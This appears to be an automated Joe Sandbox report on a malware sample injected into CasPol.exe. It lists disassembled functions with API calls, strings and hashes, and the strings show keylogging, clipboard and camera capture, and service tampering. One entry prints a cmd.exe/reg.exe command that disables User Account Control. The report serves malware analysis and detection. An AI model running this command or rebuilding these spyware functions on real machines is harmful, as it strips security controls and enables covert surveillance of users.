                                                                                                              • Opcode ID: 665a097808b038229c9a37eafed355beb7ea993dcaa7ec452e19bba1328996a1
                                                                                                              • Instruction ID: 482f1cdaf256b8236abc94a0b12de3dc55517b66349f776fa4240982defd8f75
                                                                                                              • Opcode Fuzzy Hash: 665a097808b038229c9a37eafed355beb7ea993dcaa7ec452e19bba1328996a1
                                                                                                              • Instruction Fuzzy Hash: 180171B19803047BD600FBF29D4BFDD37AC9B14705F5004277644E7093EABCA554866D
                                                                                                              Function 004064D0 Relevance: 10.5, APIs: 3, Strings: 3, Instructions: 40COMMON
                                                                                                              Download Yara Rule
                                                                                                              Strings
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000022.00000002.585780717.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_34_2_400000_CasPol.jbxd
                                                                                                              Yara matches
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID: (CG$C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe$BG
                                                                                                              • API String ID: 0-3292752334
                                                                                                              • Opcode ID: d1be4aec57154437973d558091bbe471e33116169eb7d1567a4c56866b781843
                                                                                                              • Instruction ID: a0817f974ad937f6cb5b9dd001e5131ae01746641b95ac10126ddf8aadfa6e31
                                                                                                              • Opcode Fuzzy Hash: d1be4aec57154437973d558091bbe471e33116169eb7d1567a4c56866b781843
                                                                                                              • Instruction Fuzzy Hash: 05F096B17022109BDB103774BC1967A3645A780356F01847BF94BFA6E5DB3C8851869C
                                                                                                              Function 004395FC Relevance: 9.3, APIs: 6, Instructions: 284COMMON
                                                                                                              Download Yara Rule
                                                                                                              APIs
                                                                                                              • __allrem.LIBCMT ref: 00439789
                                                                                                              • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 004397A5
                                                                                                              • __allrem.LIBCMT ref: 004397BC
                                                                                                              • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 004397DA
                                                                                                              • __allrem.LIBCMT ref: 004397F1
                                                                                                              • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 0043980F
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000022.00000002.585780717.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_34_2_400000_CasPol.jbxd
                                                                                                              Yara matches
                                                                                                              Similarity
                                                                                                              • API ID: Unothrow_t@std@@@__allrem__ehfuncinfo$??2@
                                                                                                              • String ID:
                                                                                                              • API String ID: 1992179935-0
                                                                                                              • Opcode ID: f1fde5a02fd595428c5ea82786117b3ca59670a7c5a9c6947d2ee4ceb3542413
                                                                                                              • Instruction ID: 29148231e9435c1f59b8c02308e8e4f0c882d016d38a0f6ab7871d26eba04b65
                                                                                                              • Opcode Fuzzy Hash: f1fde5a02fd595428c5ea82786117b3ca59670a7c5a9c6947d2ee4ceb3542413
                                                                                                              • Instruction Fuzzy Hash: 7A811B726017069BE724AE79CC82B6F73A8AF49328F24512FF511D66C1E7B8DD018B58
                                                                                                              Function 00444B3D Relevance: 9.2, APIs: 6, Instructions: 200COMMONLIBRARYCODE
                                                                                                              Download Yara Rule
                                                                                                              APIs
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000022.00000002.585780717.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_34_2_400000_CasPol.jbxd
                                                                                                              Yara matches
                                                                                                              Similarity
                                                                                                              • API ID: __cftoe
                                                                                                              • String ID:
                                                                                                              • API String ID: 4189289331-0
                                                                                                              • Opcode ID: 9c401b065f3bfa052971b83b22631fc3acfeb1e9040e9a62fafe9f4e5745fff8
                                                                                                              • Instruction ID: 646e0444ce84107b4b6d0ff1d92098e8eb0dfa86acef9ec08128487301265115
                                                                                                              • Opcode Fuzzy Hash: 9c401b065f3bfa052971b83b22631fc3acfeb1e9040e9a62fafe9f4e5745fff8
                                                                                                              • Instruction Fuzzy Hash: A851FC72900105ABFB249F598C81F6F77A9EFC9324F15421FF815A6281DB3DDD01866D
                                                                                                              Function 00446159 Relevance: 9.1, APIs: 3, Strings: 2, Instructions: 389COMMONLIBRARYCODE
                                                                                                              Download Yara Rule
                                                                                                              APIs
                                                                                                              Strings
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000022.00000002.585780717.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_34_2_400000_CasPol.jbxd
                                                                                                              Yara matches
                                                                                                              Similarity
                                                                                                              • API ID: __freea$__alloca_probe_16
                                                                                                              • String ID: a/p$am/pm
                                                                                                              • API String ID: 3509577899-3206640213
                                                                                                              • Opcode ID: ef0e82919ac3b8602debd5a299a6af15dd8aa9f36d72cee99fb0876ec95c8b0f
                                                                                                              • Instruction ID: cf09b504ad0dd49156c227457699755419044adef71e8be36bbdd309731302d4
                                                                                                              • Opcode Fuzzy Hash: ef0e82919ac3b8602debd5a299a6af15dd8aa9f36d72cee99fb0876ec95c8b0f
                                                                                                              • Instruction Fuzzy Hash: 5FD1F271A00206EAFB249F68D945ABBB7B0FF06300F26415BE905AB749D37D8D41CB5B
                                                                                                              Function 00403DE7 Relevance: 9.1, APIs: 1, Strings: 5, Instructions: 135sleepCOMMON
                                                                                                              Download Yara Rule
                                                                                                              APIs
                                                                                                              • Sleep.KERNEL32(00000000), ref: 00403E8A
                                                                                                                • Part of subcall function 00403FCD: __EH_prolog.LIBCMT ref: 00403FD2
                                                                                                              Strings
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000022.00000002.585780717.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_34_2_400000_CasPol.jbxd
                                                                                                              Yara matches
                                                                                                              Similarity
                                                                                                              • API ID: H_prologSleep
                                                                                                              • String ID: CloseCamera$FreeFrame$GetFrame$OpenCamera$P>G
                                                                                                              • API String ID: 3469354165-462540288
                                                                                                              • Opcode ID: 91ddb64871bfde904ede40e3b9f088facac6f709450aecbaf3ccac608dc9d27d
                                                                                                              • Instruction ID: 0dce3c58988623f436d5c5d916b021fc345e3c2d86dff9f08dc17926b78fee06
                                                                                                              • Opcode Fuzzy Hash: 91ddb64871bfde904ede40e3b9f088facac6f709450aecbaf3ccac608dc9d27d
                                                                                                              • Instruction Fuzzy Hash: A441A330A0420197CA14FB79C816AAD3A655B45704F00453FF809A73E2EF7C9A45C7CF
                                                                                                              Function 00419DEC Relevance: 9.1, APIs: 6, Instructions: 66serviceCOMMON
                                                                                                              Download Yara Rule
                                                                                                              APIs
                                                                                                              • OpenSCManagerW.ADVAPI32(00000000,00000000,00000002,00000000,?,00000000,?,?,00419507,00000000,00000000), ref: 00419DFC
                                                                                                              • OpenServiceW.ADVAPI32(00000000,00000000,00000002,?,00000000,?,?,00419507,00000000,00000000), ref: 00419E10
                                                                                                              • CloseServiceHandle.ADVAPI32(00000000,?,00000000,?,?,00419507,00000000,00000000), ref: 00419E1D
                                                                                                              • ChangeServiceConfigW.ADVAPI32(00000000,000000FF,00000004,000000FF,00000000,00000000,00000000,00000000,00000000,00000000,00000000,?,00000000,?,?,00419507), ref: 00419E52
                                                                                                              • CloseServiceHandle.ADVAPI32(00000000,?,00000000,?,?,00419507,00000000,00000000), ref: 00419E64
                                                                                                              • CloseServiceHandle.ADVAPI32(00000000,?,00000000,?,?,00419507,00000000,00000000), ref: 00419E67
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000022.00000002.585780717.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_34_2_400000_CasPol.jbxd
                                                                                                              Yara matches
                                                                                                              Similarity
                                                                                                              • API ID: Service$CloseHandle$Open$ChangeConfigManager
                                                                                                              • String ID:
                                                                                                              • API String ID: 493672254-0
                                                                                                              • Opcode ID: 02b88ba3e7911ce8c5ead6755d78df319317ed7b9ebc03ba342fc4c032229c57
                                                                                                              • Instruction ID: c28812c6d5a3476d8c1fe7dae916194da5da8b168be8dbaba893861dad7fc5da
                                                                                                              • Opcode Fuzzy Hash: 02b88ba3e7911ce8c5ead6755d78df319317ed7b9ebc03ba342fc4c032229c57
                                                                                                              • Instruction Fuzzy Hash: 3301F5311483147AD7119B39EC5EEBF3AACDB42B71F10022BF526D62D1DA68DE8181A9
                                                                                                              Function 00437E06 Relevance: 9.1, APIs: 6, Instructions: 60COMMONLIBRARYCODE
                                                                                                              Download Yara Rule
                                                                                                              APIs
                                                                                                              • GetLastError.KERNEL32(?,?,00437DFD,004377B1), ref: 00437E14
                                                                                                              • ___vcrt_FlsGetValue.LIBVCRUNTIME ref: 00437E22
                                                                                                              • ___vcrt_FlsSetValue.LIBVCRUNTIME ref: 00437E3B
                                                                                                              • SetLastError.KERNEL32(00000000,?,00437DFD,004377B1), ref: 00437E8D
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000022.00000002.585780717.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_34_2_400000_CasPol.jbxd
                                                                                                              Yara matches
                                                                                                              Similarity
                                                                                                              • API ID: ErrorLastValue___vcrt_
                                                                                                              • String ID:
                                                                                                              • API String ID: 3852720340-0
                                                                                                              • Opcode ID: 8677577c8e37d81537f7299acd8b5f5a9cc683e2404a7ed47504fd76d00458cf
                                                                                                              • Instruction ID: be779a20f6972cc68ff7cd304671387be2c97454b743a33de387a584dbd8fa65
                                                                                                              • Opcode Fuzzy Hash: 8677577c8e37d81537f7299acd8b5f5a9cc683e2404a7ed47504fd76d00458cf
                                                                                                              • Instruction Fuzzy Hash: 2A01D8B222D315ADEB3427757C87A172699EB09779F2013BFF228851E1EF294C41914C
                                                                                                              Function 00446EBF Relevance: 9.0, APIs: 6, Instructions: 50COMMONLIBRARYCODE
                                                                                                              Download Yara Rule
                                                                                                              APIs
                                                                                                              • GetLastError.KERNEL32(?,?,0043931C,?,?,?,0043E4CD,?,?,?,?,00000000,?,?,0042CE53,0000003B), ref: 00446EC3
                                                                                                              • _free.LIBCMT ref: 00446EF6
                                                                                                              • _free.LIBCMT ref: 00446F1E
                                                                                                              • SetLastError.KERNEL32(00000000,0043E4CD,?,?,?,?,00000000,?,?,0042CE53,0000003B,?,00000041,00000000,00000000), ref: 00446F2B
                                                                                                              • SetLastError.KERNEL32(00000000,0043E4CD,?,?,?,?,00000000,?,?,0042CE53,0000003B,?,00000041,00000000,00000000), ref: 00446F37
                                                                                                              • _abort.LIBCMT ref: 00446F3D
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000022.00000002.585780717.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_34_2_400000_CasPol.jbxd
                                                                                                              Yara matches
                                                                                                              Similarity
                                                                                                              • API ID: ErrorLast$_free$_abort
                                                                                                              • String ID:
                                                                                                              • API String ID: 3160817290-0
                                                                                                              • Opcode ID: c8da7f0c6bc53abe63124bd11b18efa7ba6299d8fddab580282761fd2749e6ad
                                                                                                              • Instruction ID: 3d2b287d931d31d162837175e2379b90ae0e47a7897f975c134f35b9cb22fcab
                                                                                                              • Opcode Fuzzy Hash: c8da7f0c6bc53abe63124bd11b18efa7ba6299d8fddab580282761fd2749e6ad
                                                                                                              • Instruction Fuzzy Hash: 2AF0F93560870177F6226339BD45A6F16559BC37A6F36003FF414A2293EE2D8C46451F
                                                                                                              Function 00419C20 Relevance: 9.0, APIs: 6, Instructions: 44serviceCOMMON
                                                                                                              Download Yara Rule
                                                                                                              APIs
                                                                                                              • OpenSCManagerW.ADVAPI32(00000000,00000000,00000020,00000000,?,?,?,?,?,?,0041979B,00000000,00000000), ref: 00419C2F
                                                                                                              • OpenServiceW.ADVAPI32(00000000,00000000,00000020,?,?,?,?,?,?,0041979B,00000000,00000000), ref: 00419C43
                                                                                                              • CloseServiceHandle.ADVAPI32(00000000,?,?,?,?,?,?,0041979B,00000000,00000000), ref: 00419C50
                                                                                                              • ControlService.ADVAPI32(00000000,00000001,?,?,?,?,?,?,?,0041979B,00000000,00000000), ref: 00419C5F
                                                                                                              • CloseServiceHandle.ADVAPI32(00000000,?,?,?,?,?,?,0041979B,00000000,00000000), ref: 00419C71
                                                                                                              • CloseServiceHandle.ADVAPI32(00000000,?,?,?,?,?,?,0041979B,00000000,00000000), ref: 00419C74
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000022.00000002.585780717.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_34_2_400000_CasPol.jbxd
                                                                                                              Yara matches
                                                                                                              Similarity
                                                                                                              • API ID: Service$CloseHandle$Open$ControlManager
                                                                                                              • String ID:
                                                                                                              • API String ID: 221034970-0
                                                                                                              • Opcode ID: b7b71ddbdcb9800aa748b97a69a48af82292e20b181655901ef109c96cd029b9
                                                                                                              • Instruction ID: e05d85410d15b39c35b215a1997cf582e970b4d0c8f2e3caff6268b58306b2a8
                                                                                                              • Opcode Fuzzy Hash: b7b71ddbdcb9800aa748b97a69a48af82292e20b181655901ef109c96cd029b9
                                                                                                              • Instruction Fuzzy Hash: F2F0F6325003147BD3116B25EC89EFF3BACDB45BA1F000036F902921D2DB68CD4685F5
                                                                                                              Function 00419D22 Relevance: 9.0, APIs: 6, Instructions: 44serviceCOMMON
                                                                                                              Download Yara Rule
                                                                                                              APIs
                                                                                                              • OpenSCManagerW.ADVAPI32(00000000,00000000,00000040,00000000,?,?,?,?,?,?,00419719,00000000,00000000), ref: 00419D31
                                                                                                              • OpenServiceW.ADVAPI32(00000000,00000000,00000040,?,?,?,?,?,?,00419719,00000000,00000000), ref: 00419D45
                                                                                                              • CloseServiceHandle.ADVAPI32(00000000,?,?,?,?,?,?,00419719,00000000,00000000), ref: 00419D52
                                                                                                              • ControlService.ADVAPI32(00000000,00000002,?,?,?,?,?,?,?,00419719,00000000,00000000), ref: 00419D61
                                                                                                              • CloseServiceHandle.ADVAPI32(00000000,?,?,?,?,?,?,00419719,00000000,00000000), ref: 00419D73
                                                                                                              • CloseServiceHandle.ADVAPI32(00000000,?,?,?,?,?,?,00419719,00000000,00000000), ref: 00419D76
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000022.00000002.585780717.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_34_2_400000_CasPol.jbxd
                                                                                                              Yara matches
                                                                                                              Similarity
                                                                                                              • API ID: Service$CloseHandle$Open$ControlManager
                                                                                                              • String ID:
                                                                                                              • API String ID: 221034970-0
                                                                                                              • Opcode ID: e9ecc3ae41f79f47d3bdca3e192fe5417343a180787152718365ee8199a3ebfc
                                                                                                              • Instruction ID: 9e91e616c68215657d038be5823d6e3897a30bcf6e0764f9fcdf2292ad9a2404
                                                                                                              • Opcode Fuzzy Hash: e9ecc3ae41f79f47d3bdca3e192fe5417343a180787152718365ee8199a3ebfc
                                                                                                              • Instruction Fuzzy Hash: C5F062725003146BD2116B65EC89EBF3BACDB45BA5B00003AFA06A21D2DB68DD4696F9
                                                                                                              Function 00419D87 Relevance: 9.0, APIs: 6, Instructions: 44serviceCOMMON
                                                                                                              Download Yara Rule
                                                                                                              APIs
                                                                                                              • OpenSCManagerW.ADVAPI32(00000000,00000000,00000040,00000000,?,?,?,?,?,?,00419697,00000000,00000000), ref: 00419D96
                                                                                                              • OpenServiceW.ADVAPI32(00000000,00000000,00000040,?,?,?,?,?,?,00419697,00000000,00000000), ref: 00419DAA
                                                                                                              • CloseServiceHandle.ADVAPI32(00000000,?,?,?,?,?,?,00419697,00000000,00000000), ref: 00419DB7
                                                                                                              • ControlService.ADVAPI32(00000000,00000003,?,?,?,?,?,?,?,00419697,00000000,00000000), ref: 00419DC6
                                                                                                              • CloseServiceHandle.ADVAPI32(00000000,?,?,?,?,?,?,00419697,00000000,00000000), ref: 00419DD8
                                                                                                              • CloseServiceHandle.ADVAPI32(00000000,?,?,?,?,?,?,00419697,00000000,00000000), ref: 00419DDB
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000022.00000002.585780717.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_34_2_400000_CasPol.jbxd
                                                                                                              Yara matches
                                                                                                              Similarity
                                                                                                              • API ID: Service$CloseHandle$Open$ControlManager
                                                                                                              • String ID:
                                                                                                              • API String ID: 221034970-0
                                                                                                              • Opcode ID: 578fdff71443f11c3fca357d736e88dc82f16117349863ef7b695c473245d396
                                                                                                              • Instruction ID: abda6543b9bae7672c93be1b0f3a8a56711a85df89096aceaf06b6c73a90a6e4
                                                                                                              • Opcode Fuzzy Hash: 578fdff71443f11c3fca357d736e88dc82f16117349863ef7b695c473245d396
                                                                                                              • Instruction Fuzzy Hash: C2F0C2325002146BD2116B24FC49EBF3AACDB45BA1B04003AFA06A21D2DB28CE4685F8
                                                                                                              Function 004129AA Relevance: 8.9, APIs: 3, Strings: 2, Instructions: 173registryCOMMON
                                                                                                              Download Yara Rule
                                                                                                              APIs
                                                                                                              • RegQueryInfoKeyW.ADVAPI32(?,?,?,00000000,?,?,?,?,?,?,?,?), ref: 00412A1D
                                                                                                              • RegEnumKeyExW.ADVAPI32(?,00000000,?,?,00000000,00000000,00000000,?), ref: 00412A4C
                                                                                                              • RegEnumValueW.ADVAPI32(?,00000000,?,?,00000000,?,?,00002710), ref: 00412AED
                                                                                                              Strings
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000022.00000002.585780717.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_34_2_400000_CasPol.jbxd
                                                                                                              Yara matches
                                                                                                              Similarity
                                                                                                              • API ID: Enum$InfoQueryValue
                                                                                                              • String ID: [regsplt]$DG
                                                                                                              • API String ID: 3554306468-1089238109
                                                                                                              • Opcode ID: 420c64221c8be20a0884beaa9dc5826c3a8ed3ed3fba4086070cd80455fd0dc1
                                                                                                              • Instruction ID: 09469598a034e88a10af8fecb22bb8a395a4bc85e225d04bcc93034602455e52
                                                                                                              • Opcode Fuzzy Hash: 420c64221c8be20a0884beaa9dc5826c3a8ed3ed3fba4086070cd80455fd0dc1
                                                                                                              • Instruction Fuzzy Hash: D8512E72108345AFD310EB61D995DEFB7ECEF84744F00493EB585D2191EB74EA088B6A
                                                                                                              Function 0040AE58 Relevance: 8.8, APIs: 1, Strings: 4, Instructions: 87COMMON
                                                                                                              Download Yara Rule
                                                                                                              APIs
                                                                                                                • Part of subcall function 00433519: EnterCriticalSection.KERNEL32(00470D18,00475B70,00475BF0,?,0040179E,00475BF0), ref: 00433524
                                                                                                                • Part of subcall function 00433519: LeaveCriticalSection.KERNEL32(00470D18,?,0040179E,00475BF0), ref: 00433561
                                                                                                                • Part of subcall function 004338A5: __onexit.LIBCMT ref: 004338AB
                                                                                                              • __Init_thread_footer.LIBCMT ref: 0040AEA7
                                                                                                                • Part of subcall function 004334CF: EnterCriticalSection.KERNEL32(00470D18,00475BF0,?,004017C1,00475BF0,00000000), ref: 004334D9
                                                                                                                • Part of subcall function 004334CF: LeaveCriticalSection.KERNEL32(00470D18,?,004017C1,00475BF0,00000000), ref: 0043350C
                                                                                                              Strings
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000022.00000002.585780717.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_34_2_400000_CasPol.jbxd
                                                                                                              Yara matches
                                                                                                              Similarity
                                                                                                              • API ID: CriticalSection$EnterLeave$Init_thread_footer__onexit
                                                                                                              • String ID: [End of clipboard]$[Text copied to clipboard]$,]G$0]G
                                                                                                              • API String ID: 2974294136-753205382
                                                                                                              • Opcode ID: de3fba35412e8d9275b285bd9e157dc8c129506901d01536abad46e7e0bd6fc8
                                                                                                              • Instruction ID: 172b4b58ae75f988d3b3a293bba3f35c56e57800f0e036023c2a0486d145437f
                                                                                                              • Opcode Fuzzy Hash: de3fba35412e8d9275b285bd9e157dc8c129506901d01536abad46e7e0bd6fc8
                                                                                                              • Instruction Fuzzy Hash: 44219F31A002099ACB14FB75D8929EE7774AF54318F50403FF406771E2EF386E4A8A8D
                                                                                                              Function 0040A876 Relevance: 8.8, APIs: 2, Strings: 3, Instructions: 67timeCOMMON
                                                                                                              Download Yara Rule
                                                                                                              APIs
                                                                                                              • GetLocalTime.KERNEL32(?,Offline Keylogger Started,004740F8), ref: 0040A884
                                                                                                              • wsprintfW.USER32 ref: 0040A905
                                                                                                                • Part of subcall function 00409D58: SetEvent.KERNEL32(?,?,00000000,0040A91C,00000000), ref: 00409D84
                                                                                                              Strings
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000022.00000002.585780717.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_34_2_400000_CasPol.jbxd
                                                                                                              Yara matches
                                                                                                              Similarity
                                                                                                              • API ID: EventLocalTimewsprintf
                                                                                                              • String ID: [%04i/%02i/%02i %02i:%02i:%02i $Offline Keylogger Started$]
                                                                                                              • API String ID: 1497725170-248792730
                                                                                                              • Opcode ID: d0a762379af5fb0e207909ff998a5ffb5b5a0fca7ae3eecf9d37432640f3a21d
                                                                                                              • Instruction ID: 8a7b6ca92c081f7f17d03b5bac770d689c192d548357e869dbc211d44db93d1d
                                                                                                              • Opcode Fuzzy Hash: d0a762379af5fb0e207909ff998a5ffb5b5a0fca7ae3eecf9d37432640f3a21d
                                                                                                              • Instruction Fuzzy Hash: BB118172400118AACB18BB56EC55CFE77BCAE48325F00013FF842620D1EF7C5A86C6E9
                                                                                                              Function 00409D97 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 58sleepfileCOMMON
                                                                                                              Download Yara Rule
                                                                                                              APIs
                                                                                                              • CreateFileW.KERNEL32(00000000,80000000,00000007,00000000,00000003,00000080,00000000), ref: 00409DCD
                                                                                                              • GetFileSize.KERNEL32(00000000,00000000,?,?,?,00409E6F), ref: 00409DDC
                                                                                                              • Sleep.KERNEL32(00002710,?,?,?,00409E6F), ref: 00409E09
                                                                                                              • CloseHandle.KERNEL32(00000000), ref: 00409E10
                                                                                                              Strings
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000022.00000002.585780717.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_34_2_400000_CasPol.jbxd
                                                                                                              Yara matches
                                                                                                              Similarity
                                                                                                              • API ID: File$CloseCreateHandleSizeSleep
                                                                                                              • String ID: `AG
                                                                                                              • API String ID: 1958988193-3058481221
                                                                                                              • Opcode ID: d7248f5b3272c1b8e158f3ed59b8642bc51f6090f2ebac6ec2a2f06e31ed32df
                                                                                                              • Instruction ID: 61dc848fc85204ea7fc5a67171cad01df1347b3512dd41eabc6ad436608203b4
                                                                                                              • Opcode Fuzzy Hash: d7248f5b3272c1b8e158f3ed59b8642bc51f6090f2ebac6ec2a2f06e31ed32df
                                                                                                              • Instruction Fuzzy Hash: 3A11C4303407406AE731E764E88962B7A9AAB91311F44057EF18562AE3D7389CD1829D
                                                                                                              Function 0041CA1F Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 54registryCOMMON
                                                                                                              Download Yara Rule
                                                                                                              APIs
                                                                                                              Strings
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000022.00000002.585780717.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_34_2_400000_CasPol.jbxd
                                                                                                              Yara matches
                                                                                                              Similarity
                                                                                                              • API ID: ClassCreateErrorLastRegisterWindow
                                                                                                              • String ID: 0$MsgWindowClass
                                                                                                              • API String ID: 2877667751-2410386613
                                                                                                              • Opcode ID: 8e3fabf9294f4d788ff0190a2140b1e52dfb9086da58b750c2f99102573e0e65
                                                                                                              • Instruction ID: bff961279ea7560c1ff94ea7b7e8445e3758215821d07408c43b005d8adda241
                                                                                                              • Opcode Fuzzy Hash: 8e3fabf9294f4d788ff0190a2140b1e52dfb9086da58b750c2f99102573e0e65
                                                                                                              • Instruction Fuzzy Hash: 2D01E9B1D1431EAB8B01DFE9DCC4AEFBBBDBE49255B50452AE410B2200E7704A448BA5
                                                                                                              Function 004069BA Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 42processCOMMON
                                                                                                              Download Yara Rule
                                                                                                              APIs
                                                                                                              • CreateProcessA.KERNEL32(C:\Windows\System32\cmd.exe,/k %windir%\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWORD /d 0 /f,00000000,00000000,00000000,08000000,00000000,00000000,?,?), ref: 00406A00
                                                                                                              • CloseHandle.KERNEL32(?), ref: 00406A0F
                                                                                                              • CloseHandle.KERNEL32(?), ref: 00406A14
                                                                                                              Strings
                                                                                                              • C:\Windows\System32\cmd.exe, xrefs: 004069FB
                                                                                                              • /k %windir%\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWORD /d 0 /f, xrefs: 004069F6
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000022.00000002.585780717.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_34_2_400000_CasPol.jbxd
                                                                                                              Yara matches
                                                                                                              Similarity
                                                                                                              • API ID: CloseHandle$CreateProcess
                                                                                                              • String ID: /k %windir%\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWORD /d 0 /f$C:\Windows\System32\cmd.exe
                                                                                                              • API String ID: 2922976086-4183131282
                                                                                                              • Opcode ID: eb4121427644dbe92f0faf5bfcaaefbe4213ddeedd11a12955cf8af7f240737c
                                                                                                              • Instruction ID: 91eee74bc7ca160cae255ad37e89f65ee2415c19472677646c1a5aeb81073604
                                                                                                              • Opcode Fuzzy Hash: eb4121427644dbe92f0faf5bfcaaefbe4213ddeedd11a12955cf8af7f240737c
                                                                                                              • Instruction Fuzzy Hash: 8AF030B69002A9BACB30ABD69C0EFDF7F7DEBC6B11F00042AB615A6051D6745144CAB9
                                                                                                              Function 004425D9 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 38libraryloaderCOMMONLIBRARYCODE
                                                                                                              Download Yara Rule
                                                                                                              APIs
                                                                                                              • GetModuleHandleExW.KERNEL32(00000000,mscoree.dll,00000000,?,?,?,0044258A,?,?,0044252A,?), ref: 004425F9
                                                                                                              • GetProcAddress.KERNEL32(00000000,CorExitProcess,?,?,?,?,0044258A,?,?,0044252A,?), ref: 0044260C
                                                                                                              • FreeLibrary.KERNEL32(00000000,?,?,?,0044258A,?,?,0044252A,?), ref: 0044262F
                                                                                                              Strings
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000022.00000002.585780717.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_34_2_400000_CasPol.jbxd
                                                                                                              Yara matches
                                                                                                              Similarity
                                                                                                              • API ID: AddressFreeHandleLibraryModuleProc
                                                                                                              • String ID: CorExitProcess$mscoree.dll
                                                                                                              • API String ID: 4061214504-1276376045
                                                                                                              • Opcode ID: 84f8467b83475f4999ab7b265d6d7c22c059d91a263d45f4d19e228ed4a2ac86
                                                                                                              • Instruction ID: 32bca75c9846dbfd0145c2b425e1dcbc158e0b1ec8d75d3d798e8c7ef3c4518a
                                                                                                              • Opcode Fuzzy Hash: 84f8467b83475f4999ab7b265d6d7c22c059d91a263d45f4d19e228ed4a2ac86
                                                                                                              • Instruction Fuzzy Hash: 14F04430904209FBDB169FA5ED09B9EBFB5EB08756F4140B9F805A2251DF749D40CA9C
                                                                                                              Function 00404AB1 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 35synchronizationCOMMON
                                                                                                              Download Yara Rule
                                                                                                              APIs
                                                                                                              • CreateEventA.KERNEL32(00000000,00000000,00000000,00000000,00475B70,0040483F,00000001,?,?,00000000,00475B70,004017F3), ref: 00404AED
                                                                                                              • SetEvent.KERNEL32(?,?,?,00000000,00475B70,004017F3), ref: 00404AF9
                                                                                                              • WaitForSingleObject.KERNEL32(?,000000FF,?,?,00000000,00475B70,004017F3), ref: 00404B04
                                                                                                              • CloseHandle.KERNEL32(?), ref: 00404B0D
